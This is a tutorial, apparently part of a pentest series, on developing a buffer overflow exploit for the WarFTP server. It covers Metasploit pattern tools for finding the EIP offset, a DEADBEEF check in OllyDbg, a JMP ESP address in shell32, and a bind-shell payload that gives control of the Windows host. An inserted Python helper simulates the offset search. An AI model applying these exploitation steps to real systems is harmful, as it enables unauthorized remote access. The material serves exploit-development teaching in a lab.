pattern_create is one of the tools in Metasploit that can be used in vulnerability development.
Its function is to create dummy data that has a known structure.
In part 1 the data used in the fuzzer was just a row of the letter A, 1000 bytes in total.
Now, using pattern_create, the data sent by the fuzzer is structured data, again 1000 bytes.
The main purpose of using pattern_create is to find out the actual location, inside the data packet the fuzzer submits to the application, of the string that ends up in the registers,
and that is only possible with a structured pattern of data.
- To start, open the console application and go into the folder /pentest/exploits/framework/tools/,
then generate 1000 bytes of data by running a command like this:
./pattern_create.rb 1000 > string_pattern.txt
This is the 1000-byte string pattern in string_pattern.txt.
- To view the file, use any text editor; I use Kate.
- After string_pattern.txt has been created successfully,
change the script as follows:
- After changing the value of the buffer variable to the collection of pattern strings,
which is different from before,
the current values of the registers in WarFTP's memory
are filled with the string pattern that was incorporated into the fuzzer.
pattern_offset is a tool commonly used in vulnerability development.
Its function is to calculate the number of bytes (the offset) from the start of the pattern to a given piece of it, for example the four bytes that landed in EIP.
- The first thing we do is edit the fuzzer script as below:
- Then run WarFTP in OllyDbg and run the customized fuzzer.
You can see that the value in EIP has been changed to DEADBEEF.
If the stack overwrite succeeds, it will be possible to place the payload on the stack.
- Once again we customize the xfuzz script, as below:
Repeat again: run WarFTP through OllyDbg.
In the picture it can be seen that the EIP register contains DEADBEEF from the stack, and the remainder is filled with the character
\xCC
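The two tools above are small enough to re-implement, which makes it clear why the value in EIP identifies the offset. The following is an added example, not code from the post or from Metasploit: it builds the same triplet pattern as pattern_create.rb, looks up an EIP value the way pattern_offset does (the debugger shows EIP as a little-endian 32-bit number, so the hex digits are reversed before searching), and uses a constructed model of the crash (a stack buffer of 204 bytes, chosen for illustration and not WarFTP's real frame size) to show the DEADBEEF check that the steps above perform in OllyDbg.

```python
"""Added example: the idea behind Metasploit's pattern_create / pattern_offset.

The pattern is built from triplets (uppercase, lowercase, digit) with the digit
changing fastest: "Aa0Aa1Aa2...Aa9Ab0Ab1...". Any 4-byte window of the pattern
occurs only once, so the 4 bytes that land in EIP identify exactly which part
of the buffer overwrote the saved return address.
"""
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGIT = string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGIT) * 3  # 20280 bytes before it repeats


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern (same order as pattern_create.rb)."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, value):
    """Locate `value` in `pattern`; return its byte offset or -1.

    `value` may be the 4 characters seen in memory (str or bytes), or the EIP
    value as the debugger shows it (an int, or a "0x..." hex string). EIP is a
    little-endian 32-bit number, so it is converted back to memory byte order.
    """
    if isinstance(value, str) and value.lower().startswith("0x"):
        value = int(value, 16)
    if isinstance(value, int):
        needle = value.to_bytes(4, "little")
    elif isinstance(value, str):
        needle = value.encode("ascii")
    else:
        needle = bytes(value)
    return pattern.find(needle)


def simulated_crash_eip(buffer, frame_size):
    """Constructed model of the crash (hypothetical, not the real WarFTP frame):
    the target copies `buffer` into a stack buffer of `frame_size` bytes, so the
    4 bytes right after it overwrite the saved return address and become EIP."""
    if len(buffer) < frame_size + 4:
        return None  # input too short to reach the saved return address
    return int.from_bytes(buffer[frame_size:frame_size + 4], "little")


def eip_check_buffer(offset, length, marker=0xDEADBEEF):
    """Buffer that should put `marker` into EIP if `offset` is right: filler up
    to the offset, the marker in little-endian order, then \\xCC padding."""
    body = b"A" * offset + marker.to_bytes(4, "little")
    return body + b"\xCC" * (length - len(body))


if __name__ == "__main__":
    pat = pattern_create(1000)
    eip = simulated_crash_eip(pat, 204)  # 204 is a constructed frame size
    print("EIP after crash: %08X" % eip)
    off = pattern_offset(pat, eip)
    print("offset of saved return address:", off)
    check = eip_check_buffer(off, 1000)
    print("EIP with check buffer: %08X" % simulated_crash_eip(check, 204))
```

Running it prints the simulated EIP, the offset recovered from it, and confirms that a buffer carrying DEADBEEF at that offset lands the marker in EIP, which is the same confirmation the post reads off the OllyDbg register window.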
Exploitation phase:
First we look for JMP ESP in OllyDbg; its purpose is to find out the address in memory where that instruction lives.
We know that ESP points into the buffer (the stack),
and this is what we use in the exploit.
- Run OllyDbg and select View -> Executable modules,
select shell32,
then select Search for -> Command,
type JMP ESP and click Find.
We have now found the memory address of JMP ESP in shell32.
Enter that address into the fuzzer we have made
and test the fuzzer
to see whether it works.
If successful, WarFTP will pass control to the next instructions in the buffer (stack) in memory.
- This is the final stage,
where we exploit the WarFTP application.
The steps are:
go to Konsole and type cd /pentest/exploits/framework2/
open your web browser
and go to http://127.0.0.1:5555
then select Windows and choose the bind shell payload,
change the options as shown in the screenshot,
and click Generate.
Copy the generated line of code into your fuzzer.
- Then open WarFTP, run the fuzzer and connect with telnet.
You can see that the payload successfully overwrote the existing buffer on the system
and survived; in other words, you now control the Windows system.